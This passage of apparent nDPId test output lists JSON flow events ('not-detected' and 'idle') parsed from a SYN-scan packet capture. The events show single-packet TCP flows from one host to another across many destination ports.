{"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060558,"flow_last_seen":1278275060558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060558,"flow_last_seen":1278275060558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10215,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10215,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12265,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12265,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 